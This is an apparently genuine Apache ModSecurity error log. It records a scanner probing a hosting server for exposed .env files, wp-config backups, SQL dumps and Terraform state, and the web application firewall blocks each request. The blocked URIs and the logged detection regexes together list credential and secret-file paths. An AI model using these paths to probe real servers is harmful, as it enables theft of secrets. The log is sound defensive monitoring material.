[Tue May 26 14:29:56.734259 2026] [security2:error] [pid 606909:tid 606973] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public-api/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzfwAA-z8"]
[Tue May 26 14:29:56.735156 2026] [security2:error] [pid 606909:tid 606978] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzgAAA-0Q"]
[Tue May 26 14:29:56.736496 2026] [security2:error] [pid 606909:tid 606972] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/phpinfo.php"] [unique_id "ahVhDF0yRtX9qA7aVUVzgQAAkz4"]
[Tue May 26 14:29:56.760424 2026] [security2:error] [pid 606909:tid 606982] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public_html/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzgwAA40g"]
[Tue May 26 14:29:56.782467 2026] [security2:error] [pid 606909:tid 606985] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/qa/.env"] [unique_id "ahVhDF0yRtX9qA7aVUVzhQAAlUs"]
[Tue May 26 14:29:57.075501 2026] [security2:error] [pid 606909:tid 607003] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/s3/.env.bak"] [unique_id "ahVhDV0yRtX9qA7aVUVzpwAAzl0"]
[Tue May 26 14:29:57.174819 2026] [security2:error] [pid 606909:tid 606921] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzsQAAkQs"]
[Tue May 26 14:29:57.175898 2026] [security2:error] [pid 606909:tid 606989] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/api/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzsgAAkU8"]
[Tue May 26 14:29:57.200296 2026] [security2:error] [pid 606909:tid 606922] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/backend/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVztAAA9Qw"]
[Tue May 26 14:29:57.279693 2026] [security2:error] [pid 606909:tid 606931] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/service/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzvwABABU"]
[Tue May 26 14:29:57.283277 2026] [security2:error] [pid 606909:tid 607019] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/services/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzwAAAim0"]
[Tue May 26 14:29:57.371043 2026] [security2:error] [pid 606909:tid 607022] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shared/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzxwAAzHA"]
[Tue May 26 14:29:57.390576 2026] [security2:error] [pid 606909:tid 607023] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shop/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzywAAp3E"]
[Tue May 26 14:29:57.413407 2026] [security2:error] [pid 606909:tid 606961] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/src/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVzzgAAujM"]
[Tue May 26 14:29:57.536407 2026] [security2:error] [pid 606909:tid 606964] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stage/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz3AAA0jY"]
[Tue May 26 14:29:57.536810 2026] [security2:error] [pid 606909:tid 606983] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/srv/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz2wAA0kk"]
[Tue May 26 14:29:57.549919 2026] [security2:error] [pid 606909:tid 606975] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/staging/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz3QAA50E"]
[Tue May 26 14:29:57.620613 2026] [security2:error] [pid 606909:tid 606963] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stg/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz4wAA5jU"]
[Tue May 26 14:29:57.682538 2026] [security2:error] [pid 606909:tid 607029] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stripe/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz6gAArHc"]
[Tue May 26 14:29:57.684433 2026] [cgid:error] [pid 606909:tid 607037] [remote 195.178.110.199:50950] AH01264: stderr from /home2/azurm42s/gestionbar.azurmediatec.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 14:29:57.723199 2026] [security2:error] [pid 606909:tid 606945] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVhDV0yRtX9qA7aVUVz8QAAqSM"]
[Tue May 26 14:29:57.727956 2026] [security2:error] [pid 610693:tid 610948] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhDTvNO3hpmlY6M8RthQAAAH0"]
[Tue May 26 14:29:57.773196 2026] [security2:error] [pid 606909:tid 606970] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test.php"] [unique_id "ahVhDV0yRtX9qA7aVUVz9QAApjw"]
[Tue May 26 14:29:57.792998 2026] [security2:error] [pid 606909:tid 606948] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz9gAAoyY"]
[Tue May 26 14:29:57.828226 2026] [security2:error] [pid 606909:tid 606954] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/user/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz-gAAhyw"]
[Tue May 26 14:29:57.829254 2026] [security2:error] [pid 606909:tid 606981] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v1/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz-wAAh0c"]
[Tue May 26 14:29:57.844294 2026] [security2:error] [pid 606909:tid 606971] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v2/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz_gAA_z0"]
[Tue May 26 14:29:57.845160 2026] [security2:error] [pid 606909:tid 606984] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v3/.env"] [unique_id "ahVhDV0yRtX9qA7aVUVz_wAA_0o"]
[Tue May 26 14:29:57.998501 2026] [security2:error] [pid 606909:tid 607036] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/.env"] [unique_id "ahVhDV0yRtX9qA7aVUV0EQAAyH4"]
[Tue May 26 14:29:58.016806 2026] [security2:error] [pid 606909:tid 607010] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/html/.env"] [unique_id "ahVhDl0yRtX9qA7aVUV0EgAAkGQ"]
[Tue May 26 14:29:58.067122 2026] [security2:error] [pid 606909:tid 606956] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/web/.env"] [unique_id "ahVhDl0yRtX9qA7aVUV0FQAAnC4"]
[Tue May 26 14:29:58.163659 2026] [security2:error] [pid 606909:tid 606965] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/website/.env"] [unique_id "ahVhDl0yRtX9qA7aVUV0IwAAwTc"]
[Tue May 26 14:29:58.213161 2026] [security2:error] [pid 606909:tid 607001] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php"] [unique_id "ahVhDl0yRtX9qA7aVUV0JQAA81s"]
[Tue May 26 14:29:58.213320 2026] [security2:error] [pid 606909:tid 607001] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.bak"] [unique_id "ahVhDl0yRtX9qA7aVUV0JgAA81s"]
[Tue May 26 14:29:58.213368 2026] [security2:error] [pid 606909:tid 607012] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.new"] [unique_id "ahVhDl0yRtX9qA7aVUV0JwAA82Y"]
[Tue May 26 14:29:58.234411 2026] [security2:error] [pid 606909:tid 607003] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.old"] [unique_id "ahVhDl0yRtX9qA7aVUV0KAAAl10"]
[Tue May 26 14:29:58.238068 2026] [security2:error] [pid 606909:tid 606919] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVhDl0yRtX9qA7aVUV0KgAAlwk"]
[Tue May 26 14:29:58.286889 2026] [security2:error] [pid 610693:tid 610834] [client 202.141.83.254:53924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhDjvNO3hpmlY6M8RtnwAAAAs"]
[Tue May 26 14:29:58.287181 2026] [security2:error] [pid 610693:tid 610834] [client 202.141.83.254:53924] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhDjvNO3hpmlY6M8RtnwAAAAs"]
[Tue May 26 14:29:58.422226 2026] [security2:error] [pid 610693:tid 610863] [client 195.178.110.199:48048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtowAAACg"]
[Tue May 26 14:29:58.457391 2026] [security2:error] [pid 610693:tid 610853] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtpgAAAB4"]
[Tue May 26 14:29:58.528870 2026] [security2:error] [pid 610693:tid 610849] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/*update.cgi*"] [unique_id "ahVhDjvNO3hpmlY6M8RtrAAAABo"]
